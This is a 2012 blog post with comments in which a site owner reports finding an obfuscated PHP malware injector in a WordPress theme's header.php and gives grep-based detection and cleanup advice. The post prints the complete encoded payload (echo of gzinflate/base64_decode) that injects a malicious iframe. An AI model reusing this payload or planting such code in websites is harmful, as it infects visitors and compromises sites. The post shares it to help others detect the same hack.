Skip to content

My WordPress header.php Got Hacked – snxstat77.info

by arlo on May 12th, 2012  Tip

Today I went to see some analytics and noticed that traffic was unusually down. I went to a popular wiki page that usually drives a lot of traffic to check if my link was there. It sure was, but when I clicked on it chrome gave me a malware warning!

XSS Hack (cross site scripting)

If you do a search for the offending website snxstat77.info you will not find anything. So I looked at the live DOM via chrome tools (or you can use firebug) to search for the site, and sure enough I found it.



At this point I knew there was some Javascript being loaded that was dynamically creating this iframe. I searched the DOM in fear that it might be a 3rd party wordpress plugin gone rogue, but found nothing. Then I took a look at my header.php for my theme, BINGO! I see this confuscated block of characters that screams machine generated. Turns out it’s some sort of hash that is being decoded and creates a script tag which in turn injects an iframe into the DOM. So I quickly removed it and saw the warning go away. Hopefully this post helps others locate a similar problem with their site. Here is the code that I had to remove from my header.php:

#32d494#
echo(gzinflate(base64_decode("zVZtb5swEP4ts5CAotDYYF7msn2I9gv2McqHvMCgSkMCbqsm6n+fzy+EpE3Kqk2aFIh9
vrvnzvfC3bXLptryb7x5OeyyVb18fMg33F82+ZznP9Y57By0Qh6qxPOEXLbz59ttvllNymq9cnYeErTX5ZwvS2f37B7KbDTG5Ja
yV1C5bWpe85dtblgWTb5o3EPLs5+8qTa/2H6f2fO1Lf/3T7bfPi5a3jiYBCNMiOvt96xts+mMFZldNLZn1w/iNSltVnhCspmoRb
3Kbfac8bJqWZ49T4spUprQzMEY1MzYJkOBTy14KIbX2MLUwqkVphYNBSFMgBrDC5jCFFahoFiECO6OFFuBVBLo/RkzjQBFSAApx
FYoNYJ4kOhNJyHQcSKhtQmpEpNELBUAmQgoaigRqKLak3OPaHQOISiAAkuSnElGIIUNY6BMV4ZdwBl2V4nCVUbFR1cji6RXTMVU
WQAnoIJ0V0GxvFnxAy8EBpwS3/AL4FQvY61UGAJ79SIaNJS4oRFWt0y1vVi7FwPaEZoEKgAdM9beYhNWZdwVCW0YTXtZ0/Mt0bq
izgpDCborpCp+EksbKn/KKxVYqlw76pGu+IYMbOpyQH/U0QMdRx0npcvk9li6loA76iDWUrRPlX4EY4iuisrFEAsmHF3Lxj5Boi
vTw+Qdf/DAvH+/YkwxRlKPbAYkNfUwIMtDneWSGvav8Gp7MCV/pQy64ldXNJYJHPX7j4lu3JUZxDQ+K7fEPysolZ7439fUe8a/q
QDyJ6l/0greVoDybADix0XSIX1cK4NRT8up1ymGq+gV3ofyn8mTtz3wJFtOm9rfSs4LvXQQ8qe+TP/DVxx6R6wb9hFTCAWkl9/S
MFANreliv0RTx8nd76hFX8Uk5qGtGNPWFRdjD5pb3eGjPjUTkeuyom6cKotGZIThYdWI0uBLNmaV57mH+6xiVeG03BXTV9t6Lfe
Lpn6YlGLiErOWM8I35Y2DPXyzmd7PhLrXnWBjubMTy7tbPVX+Bg==")));
#/32d494#

Investigating the Hack

I am still in the middle of figuring out where the vulnerability is on my site. I recently (2 days ago) updated my WordPress install to 3.3.2 (newest) and this is the first time I have been hacked. Not sure if WordPress is to blame or not, either way I would like to find out how this happened.

Update: 1

I found this blog post that seems to explain what happened to my WordPress install. I also changed my password on my server and ftp accounts. Then I did a search to see how far this little hack has gone.

grep -R 'echo(gzinflate(base64_decode(' *

This revealed that ALL my WordPress themes were hacked.


So far it doesn’t look like a WordPress flaw, but more like my SSH/FTP account had been compromised. Then the intruder, noticed I had a WordPress site and decided to inject all my themes. :P

From → Javascript, WordPress

  • Thomas

    You haven’t solved the problem.

    Some vulnerability allowed someone (probably using an automated tool) to compromise your server or WordPress installation, and that’s what allowed them to modify your header.php. You’ve removed the damage caused, but the vulnerability is still there. That means that sometime soon, the same thing will happen again.

  • http://www.arlocarreon.com Arlo Carreon

    Right you are! I just found the hack about 30 minutes ago and removed it (then wrote a blog post ;p ).  As soon as I find out where the vulnerability is, I will add on to this post.

  • http://waiverform.org/paintball-waiver-form/ PaintBall

    Id make sure you have the latest version of wp installed

  • http://www.arlocarreon.com Arlo Carreon

    I absolutely do (3.2.2). It just so happens I updated about 2 days ago. I updated the post stating that I am not sure whether it is WordPress or not, but I would love to find out.

  • Thomas

    Just keep in mind that even if you find and fix the vulnerability, you’ll still need to do a full, clean reinstall. 

    Most malicious hackers will try to drop a stealth web shell somewhere on servers that they compromise, which will give them access whenever they want. Those can be hidden in .htaccess files, random php files on your server – pretty much anywhere.

  • http://www.arlocarreon.com Arlo Carreon

    wow, didn’t know that. I’ll see what I can do.

  • apmeyer

    Make to change all your passwords. Very possible someone simply accesses your install via FTP or logged into wordpreas directly and edited the header there. If you’re not usin something like 1password, I’d start. Best of luck. Let us know what else you uncover.

  • http://www.arlocarreon.com Arlo Carreon

    Thanks! I just changed my password to a more secure one. Reddit users seems to all agree that infected computers look for filezilla files, which store passwords in plain text.  

  • Pingback: Wordpress header.php Got Hacked – snxstat77.info | Arlo Carreon | Casapress.info

  • http://www.facebook.com/hoybensarmiento Ben Sarmiento
  • Kenfeldman

    Check for the Timthumb Vulnerability — this has all the markings of that.

  • Tollens Griffbek

    Do you even know what you are doing?   You say “see this confuscated block of characters that screams machine generated” – aren’t you aware of base64 encoding?

    The problem is that your site probably has terrible security and you don’t fully understand enough to get on top of the problem.

  • Paul

    I had something similar to this happen. It turned out to be an old plugin (IIRC it was a photo editing plugin) for the WordPress 2x series that needed updating. Anyway, the plugin effectively compromised the whole installation. I re-installed with the latest WordPress and re-configured each plugin individually.

  • http://twitter.com/MatthewForzan Matthew Forzan

    Can confirm this is NOT limited to WordPress installs. Just finished cleaning up a custom built website where the index.php file was infected (in the header section). File was modified on the 10th and still not sure how they got in.

    As always, make sure you have the usual backups and do the password changes frequently. Look at ways to increase your security – there are many options out there including making your files only writeable from your home/work IP address.

    Unfortunately these hacks will be around for some time and as the hackers get smarter, we need to as well.

  • Nick Alpin

    Great job in catching the rogue code and thanks for sharing. It may be useful to notify your host, they may have tools that could quickly run through file permissions, access history, etc. If they’re helpful, they may be able to spot files accessed by/modified from locations other than yours. Same for finding any hidden scripts, etc. 

  • Rick H

    Here’s the attack vector:

    If you use FileZilla as your FTP client, the FTP credentials for your connections are stored in a plain text file (look in your %APPDATA%/Roaming/Filezilla folder). There are malware that will get that connection credentials and use it to modify your file (in your case, the header.php in your WordPress theme directory). That’s how they put that code inside the file.

    And FileZilla does not see that plain text file as a security risk. (WTF ???)

    My response: immediately delete FileZilla, manually remove the folder in %APPDATA% (because the uninstall doesn’t), change your site’s FTP credentials (user name and password), then use WinSCP (www.winscp.net )as your FTP client. WinSCP lets you assign a master password so that site connection credentials are encrypted.

    And do a full antivirus scan.